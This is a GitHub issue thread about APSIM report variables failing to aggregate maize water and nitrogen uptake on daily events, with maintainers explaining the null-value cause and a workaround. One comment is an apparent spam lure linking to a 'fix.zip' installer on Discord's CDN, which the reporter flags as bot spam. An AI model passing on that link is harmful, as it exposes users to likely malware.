### ISSUE TITLE
Aggregating [Plant].WaterUptake and .NitrogenUptake does not work for reporting events other than [Plant].Harvesting

### ISSUE THREAD

**Issue by LenLon** [APSIMInitiative/ApsimX#9280]
### What happened?

Trying to get the aggregated sum of my maize water uptake on a daily frequency (to sum up later for each phenological stage) yields this error:

```
Error in report Report: Invalid report variables found:
Sum(Maize.WaterUptake): Cannot find variable: [Maize].WaterUptake while evaluating expression: Sum([Maize].WaterUptake)
```

Testing using the array syntax gives:

```
Error in report Report: Invalid report variables found:
Sum(Maize.WaterUptake(1)): Array index 1 is invalid for WaterUptake (WaterUptake is not an array)
```

If I only use `[Plant].Harvesting` as the report event, the aggregated variables report out fine. 

### What Operating System are you on?

Windows

### What APSIM version are you on?

2024.7.7556

**Comment by Limxxx** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by LenLon** [comment]
> try this https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538& select the desired compiler in the installer

Seems like the discord spam bots have invaded a crop modelling github issue forum, baffling

**Comment by par456** [comment]
I think what is happening here is that when it's switched to daily events, the report will run prior to the Maize being planted, this then means a value of Null is passed to the Sum function and it crashes. It works without the Sum in the report and just reports empty cells on the null days, Sum should probably have the same behaviour.

**Comment by par456** [comment]
So, after spending a few hours looking into the expression evaluation code, I think I can say that we can't make Sum work how I suggested above. The error occurs because the array that is to be summed is still null, which causes the locator to fail when returning a value. But then the expression code can't tell the difference between 'null' because the variable doesn't exist and 'null' because the value is null and give that less than helpful error message.

Even if I did overhaul the code here to get it to tell the difference, it then doesn't track null values, so it would have to start passing around NaNs, and then NaN handling code would be needed. It just ends up being too much work for a small fix.

Instead I'll get the error messages to be more helpful, and for this issue in particular, change your reporting frequency to:
```
[Clock].EndOfDay && [Maize].IsAlive
```
So that it only reports on days that the maize is actually alive

**Comment by LenLon** [comment]
Thank you Andrew! 

Unfortunately the new reporting frequency also throws:

`Failed to publish event SubscribeToEvents. Error from subscriber SubscribeToEvents.OnSubscribeToEvents --> Exception has been thrown by the target of an invocation. --> Invalid report frequency found: [Clock].EndOfDay && [Maize].IsAlive`

**Comment by par456** [comment]
You might need to update to a newer version of apsimng, the ability to use that sort of frequency was only added a few weeks ago.
